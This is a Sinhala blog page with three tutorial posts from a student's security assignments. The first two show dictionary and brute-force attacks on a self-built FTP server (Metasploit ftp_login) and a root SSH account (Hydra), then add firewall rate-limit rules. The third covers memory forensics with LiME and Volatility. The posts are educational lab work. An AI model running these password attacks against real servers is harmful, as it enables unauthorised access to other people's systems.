July 2018
best sinhala blog in sri lanka

හරි පිංවතුනි අද කියන්න හදන්නේ Degree එකේදී කරපු තව assignment එකක්
ඒ තමා කොහොමද ftp server එකකට Dictionary attack එකක් දෙන්නේ කියල.


වැඩි කතා ඕනි නෑ අපි වැඩේට බහිමුකො


  1. මේකෙදි මගේ මැක් එකෙන් ftp service එකක් හැදුව
     මගේ Mac-server එකේ FTP Server එක on කරලා ftp user කෙනෙක් හැදුව. පාස්වඩ් දැම්මේ simple එකක්.
    1. මේ තියෙන්නේ mac එකේ ftp server එක on කරපු විදිහ
      ඔයාලට පුළුවන් windows server එකක ftp එකක් දාන්න නැත්තම් ලිනක්ස් වලත් පුළුවන්


    1. මේ තියෙන්නේ user ව හදපු විදිහ


    1. ඊටපස්සේ මන් ඒ හදපු user ව folder එකක් හදල එකට දුන්න




  1. ඊටපස්සේ වෙන මැෂින් එකකින් ලොග් වෙලා බැලුව හරිද කියල ඔන්න වැඩ






  1. ඊටපස්සේ මන් කාලි එකට ගිහිල්ලා userlist එකක් සහ password list එකක් හදාගත්ත.
 user ලිස්ට් එකේ අපිට පුළුවන් attack කරන්න ඕනි env එකේ විදිහට නම් දාන්න උදාහරණයක් කිව්වොත් ලංකාවේ office වල බොබ් ල බිල් ලා නෑනේ ඉන්නේ අමල් කමල් නිමල් වගේ නේ ඉතින් අපි හැමවෙලාවෙම ප්‍රායෝගික විදිහට හිතන්න ඕනි
මන් මෙතන කරන්නේ demo එකක් නිසා මන් ම ftp service එක හදල මන් ම හැක් කරනවා නමුත් ඇත්තටම ඒක නෙමේ වෙන්න ඕනි.

මේ විදිහට user ලිස්ට් එකයි pass ලිස්ට් එකයි හදාගන්න







  
  1. දැන් metasploit එක open කරන්න මේ විදිහට වැටෙයි.



  1. දැන් මේ කමාන්ඩ් එක ගහන්න “use auxiliary/scanner/ftp/ftp_login



  1. දැන් අපි attack කරන්න ඕනි කෙනාගේ ip එක ගහන්න “msf exploit (ftp_login)>set rhosts 192.168.1.103”



  1. දැන් අපි හදාගත්ත user name file එක සෙට් කරන්න “msf exploit (ftp_login)>set user_file  /root/Desktop/passusr.txt”




  1. දැන් පාස්වර්ඩ් file එකත් add කරගන්න මේ විදිහට “msf exploit (ftp_login)>set PASS_FILE /root/Desktop/passlist.txt”

  1. දැන් කරන්න හදන්නේ username පාස්වඩ් හොයාගත්ත ගමන් නවත්තන්න කියල එකට මේක ගහන්න “msf exploit (ftp_login)>set stop_on_success true”





  1. දැන් ඉතින් මේ විදිහට දෙන්න තියෙන්නේ “msf exploit (ftp_login)> exploit”
 එතකොට මේ වගේ අර අපි දීපු username file එකයි පාස්වර්ඩ් ෆයිල් එකයි තියන ඒවා ටෙස්ට් කර කර බලනවා හරියනවද කියල


  1. අන්තිමට හරිගියාම මේ විදිහට පෙන්නනවා



ඔන්න ඉතින් අපි ftp server එකකුත් හැක් කරා



මට කියන්න තියෙන්නේ ඉතින් මේවා තමන්ගේ server වල ආරක්ෂාව කොහොමද කියල බලන්න සහ අධ්‍යාපනය සඳහා පමණක් පාවිච්චි කරන්න කොයි වෙලාවකවත් පොඩි පොඩි පාස්වඩ් දාන්න එපා සහ කොමන් පාස්වර්ඩ් දාන්න එපා සහ dictionary එකේ තියන වචන දාන්න එපා කීයටවත්, ඒ වගේ දේවල් තමා අනිත් අයට තියන සිදුරු ඔයාගේ office එකට එන්න.

ඉතින් කියන්න තියෙන්නේ security එක ගැන මීට වඩා හිතන්න කියල
ගිහින් එන්නම්...
best sinhala blog in sri lanka
හරි පිංවතුනි ඔන්න අද අපි කරන්න හදන්නේ කොහොමද ssh වලට ගේමක් දෙන්නේ කියල

මේකට ඉතින් ලේසියෙන්ම වැඩේ කරගන්න මන් පාවිච්චි කරන්නේ කාලි එකක්


ඒ වගේම කියන්න ඕනි මේකෙන් පෙන්නන්න හදන්නේ අපේ system වල තියන අඩු ආරක්ෂා කිරීමේ ක්‍රියා කොටින්ම සිම්පල් පාස්වඩ් දාල තියන සර්වර් වලට කොහොමද මේ වගේ attack එකක් දෙන්නේ කියල
මේක අධ්‍යාපනය සඳහා සහ ආයතයේ යහපත උදෙසා මිස අකුසල් චේතනාවෙන් නම් කරන්න එපා කියල මන් ඉල්ලා සිටිනවා


වැඩේ කරන්න පුළුවන් අවස්ථා ගැන පහලින් කියල තියනව

පළවෙනියට තියෙන්නේ අපට අමතක වෙනවා රවුටර් එකෙන් පොර්ට් ෆොර්වර්ඩ් වහන්න හරි අමතක වෙලා ssh පොර්ට් එක open කරලා තියනව අන්න ඒ වගේ අතපසු වීම් වලින් අනිත් අයට පුළුවන් මේ වගේ වැඩක් කරලා ඔයාගේ ගෙදරට හරි ආයතනයට හරි පහසුවෙන්ම ඇතුළුවන්න.



දෙවෙනියට තියන රූපේ විදිහට අපේ same network එකේ ඉන්න කෙනෙකුට ලේසියෙන්ම පොර්ට් scan එකක් කරලා මේ වැඩේ කරන්න පුළුවන්මතක තියාගන්න පොර්ට් scan එකක් කරනවා කියන්නේ නීතියට පටහැනි ක්‍රියාවක් බව කරුණාවෙන් සලකන්න
scan එකක් කරන්න ඔයාට approved කරපු mail එකක් හෝ ලිකිත සාක්ෂි ඉදිරිපත් කරන්න වෙනවා නැත්තම් වෙන්නේ wireshark හරි රවුටර් ලොග් බලල ඔයාව කෙලින්ම අල්ලගන්න පුළුවන්.








හරි කාලිය open කරගෙන මේ විදිහට text file එකක් හදාගන්න කොමන් පාස්වර්ඩ් දාල
නැත්තම් ඕනි තරම් wordlist තියනව දාගන්න

nano Desktop/passuser.txt




හරි මන් කරේ ඔයාලට පෙන්නන්න නිසා මේ වගේ පොඩි පොඩි වචන සෙට් එකක් දැම්මේ



මන් ඔයාලට පෙන්නන්න ඕනි නිසා centos සර්වර් එකක් දැම්ම මේකේ default root ssh open කරලා තියෙන්නේ
කොහොමත් එහෙමනේ මේවගේ gui නැනේ

දැන් යන්න අපේ සර්වර් එකට මේකෙදි මන් කරේ simple පාස්වර්ඩ් එකක් දැම්ම ඔයාලට පෙන්නන ඕනි නිසා


මන් මේකේ ip එක හොයාගත්ත නමුත් ඔයාලට වෙනවා ip පොර්ට් scan එකක් කරලා network එකේ තියන 22 ssh open කරපු ඒවා හොයාගන්න



දැන් ping එකක් දාල බලන්න reach වෙන්න පුළුවන්ද බලන්න



හරි දැන් මේ කමාන්ඩ් එක ගහන්න විතරයි තියෙන්නේ

hydra -l root -P Desktop/passuser.txt 192.168.1.94 -t 4 ssh


ඕකෙන් කරන්නේ root කියන user name එකට අපි හදපු පාස්වර්ඩ් file එකේ තියන පාස්වර්ඩ් එකින් එක check කරලා බලන එක

ඉතින් හරි එක එනකල්ම මෙයා බලනවා
ආවට පස්සේ මෙයා හරි එක කොළපාටින් පෙන්නනවා මේ වගේ


දැන් තියෙන්නේ ලොග් වෙන්න
ssh root@192.168.1.94
දැන් ඔයාට පේනවා ඇති අපි ලස්සනට ලොග් උනා කියල 
හැබැයි ඒ වගේම පේනවා ඇති මෙයා 13 වතාවක් try කරලා තියනව අපේ සර්වර් එකට වැරදි පාස්වර්ඩ් එකක් ගහල ලොග් වෙන්න
ඒවා තමා අපි බලන්න ඕනි ලොග් උන ගමන්



දැන් බලමු මේකෙන් ආරක්ෂා වෙන්න ගන්න පුළුවන් ක්‍රියාමාර්ග
1 තමා තමන් ssh පාවිච්චි කරන්නේ නැත්තම් එක off කරලා තියන්න
අවශ්‍ය විටක පමණක් ssh on කරගන්න
ssh 22 වෙනුවට වෙන පොර්ට් එකක් දාන්න
firewall-cmd rules දාන්න


දැන් අපි ලේසියෙන්ම firewall-cmd rule එකක් add කරමු

firewall-cmd --permanent --direct --add-rule ipv4 filter INPUT_direct 0 -p tcp --dport 22 -m state --state NEW -m recent --set
firewall-cmd --permanent --direct --add-rule ipv4 filter INPUT_direct 1 -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 30 --hitcount 4 -j REJECT --reject-with tcp-reset
firewall-cmd --reload 



දැන් බලන්න hack කරන්න බැරි උනානේ


 දැන් exit වෙන්න ටෙස්ට් කරලා බලන්න


ඔන්න පුතේ පොර්ට් එක ඩවුන්



දැක්කනේ ඔන්න ඔය වගේ දේවල් වලින් පුළුවන් ලේසියෙන්ම attack එකක් තාවකාලිකව නවත්වගන්න ඉතින් කියන්න තියෙන්නේ security ගැන මීට වඩා හිතන්න කියල තමා



best sinhala blog in sri lanka
හරි පින්වතුනි අද නම් කරන්න හදන්නේ පොඩ්ඩක් විතර ලොකු වැඩක්
ඒ තමා ලිනක්ස් මැෂින් එකකින් ram එකේ කොපියක් අරන් එකේ මොනාද තියෙන්නේ සහ එකෙන් ගන්න පුළුවන් විස්තර ටිකක් ගැන කතා කරන එක. මේක ඕනි වෙන්නේ ඉතින් වයිරස් එකක් වගේ ආවම එක ගැන හොයන උදවියට සහ Information Security සෙට් එකට තමා

වැඩි කතා ඕනි නෑ අපි වැඩේ පටන් ගමු

ඉස්සෙල්ලම මේකට දාගන්න ඕනි වෙනවා පොඩි පොඩි දේවල් ටිකක්
ඒ ටික මේ කමාන්ඩ් ගහල install කරගන්න

sudo apt-get install build-essential
sudo apt-get install linux-headers-`uname -r`
sudo apt-get install git nano python dwarfdump zip python-distorm3 python-crypto

දැන් LiME එක දාගන්න හදන්නේ Linux Memory එක Extract කරගන්න.

දැන් අපි git එකෙන් clone එකක් අරන් වැඩේ කරමු
git clone https://github.com/504ensicsLabs/LiME
cd LiME/src/
make

make එක ගැහුවම file එකක් හැදෙනවා lime-4.13.0-36-generic.ko. කියල ඔයාලගේ file name එක වෙනස් වෙන්න පුළුවන් හොඳේ

දැන් අපි ram dump එක ගන්න හදන්නේ
එකට මේ කමාන්ඩ් එක ගහන්න.
sudo insmod lime-4.13.0-36-generic.ko "path=memory.mem format=lime”
දැන් අපි හදාගන්නවා file එකක් memory.mem කියල අන්න ඒ file එක ඔයාගේ ram එකේ සයිස් එක වෙනවා ඒ කියන්නේ 8 gb නම් ඒ ගාන සෙට් වෙනවා ඒ නිසා ඉඩ නම් ඕනි හාඩ් එකේ මේ වැඩේට.

Installing Volatility

උඩින් අපි ගත්ත ram එකේ dump එක, එත් මේක බලන්න අපිට ඕනි වෙනවා පොඩි මැප් එකක් හරියට manual එකක් වගේ එකක්
එකට අපි කියනවා profile එකක් කියල
මේකෙදි වෙන්නේ අපි අර ram dump එක ගන්න මැෂින් එකේ system මැප් එකයි මොඩියුල් එකකුයි දාල හදාගන්නවා පොඩි මැප් එකක් මෙහෙම address එකක් ආවම එකේ තියෙන්නේ මෙන්න මෙහෙමයි කියල,

හරි දැන් අපි Volatility එක git එකෙන් අරන් වැඩේ පටන් ගමු.
cd ../../
git clone https://github.com/volatilityfoundation/volatility
cd volatility/tools/linux/
make clean
make




දැන් අපි බලමු  /boot/ වල මොනාද තියන system මැප් කියල
ls -al /boot/
මේකේ සෙට් එකක් එයි අපිට ඕනි වෙන්නේ දැන් යන එක ගන්නනේ අන්න එකට 
uname -r 


එකක් ගහල බලාගන්න පුළුවන් මොකක්ද දැනට use කරන්නේ කියල
Volatility Profile එක හදාගමු
මේකෙදි කරන්නේ module.dwarf එකයි system මැප් එකයි අරන් profile එක නම දාල zip file එකක් හදාගන්න එක
cd ../../
sudo zip volatility/plugins/overlays/linux/Ubuntu160403-040400-89.zip tools/linux/module.dwarf /boot/System.map-4.13.0-36-generic

Running Volatility

වැඩේ හරිද කියල බලාගන්න මේ කමාන්ඩ් එක ගහන්න
python vol.py --info | grep Linux

වැඩේ හරි නම් මේ නමින් profile එකක් පෙන්නන්න ඕනි LinuxUbuntu160403-040400-89×64.


දැන් ලිනක්ස් වල තියන plugins බලාගන්න මේ කමාන්ඩ් එක ගහන්න.
python ./vol.py --info | grep -i linux_


දැන් අපි බලන්න හදන්නේ අපි ගත්ත memory dump එකේ මොනවද අපිට ගන්න පුළුවන් දේවල් කියල බලන්න.

එකට මේ කමාන්ඩ් එක ගහන්න
sudo python vol.py -f memory.mem --profile=LinuxUbuntu160403-040400-89x64 linux_bash
මේකේ output එක වෙනම ෆයිල් එකකට ගන්න 


sudo python vol.py -f memory.mem --profile=LinuxUbuntu160403-040400-89x64 linux_bash > linux_bash.txt
කියල ගහල ගන්න පුළුවන්

දැන් බලමු windows වල ram එකේ dump එක ගන්නේ කොහොමද කියල


වැඩිය මොකුත් නෑ මේ exe එක git එකෙන් ගන්න තියෙන්නේ
https://github.com/thimbleweed/All-In-USB/blob/master/utilities/DumpIt/DumpIt.exe
ඊටපස්සේ ඩබල් ච්ලික් කරා Y අකුර එබුවා හැබැයි ඉඩ තියෙන්න ඕනි 8 gb ram නම් 8ක්ම


දැන් එක අපේ ලිනක්ස් එකට කොපි කරගන්න මේ වගේ



ඉටපස්සේ එක අර කලින් අපි කරා වගේ profile හදන්න ඕනි කතන්දර නෑ මේකෙදි

python vol.py --info 
එකක් ගහන්න එකේ එයි windows වලට අදාළ profile සෙට් එක



ram dump එක ගත්තේ මොන windows එකෙන්ද බැලුව profile එක select කරා කමාන්ඩ් එක ගැහුවා

sudo python volatility/vol.py -f MANUSHA-PC-20180723-122115.raw --profile=Win7SP1x64_24000 amcache 

මේකේ තියනව ලිනක්ස් සහ windows වලට එන plugin සෙට් එකම දාල script 2ක් කරන්න තියෙන්නේ clone එකක් අරන් වැඩේ කරන් යන එක

https://github.com/manushaamal/volatility_scripts/tree/dev

මේක ඉතින් අපේ assignment එකක් ඔයාලත් එක්ක සහ අපේ Ethical Hacking කරන අනිත් සෙට් එකත් එක්ක බෙදාගන්න ඕනි උන නිසා පොස්ට් එකක්ම දැම්ම,

එහෙනම් ඉතින් මන් ගිහින් එන්නම්.
උදවු ගත්තේ මේ ලිපියෙන්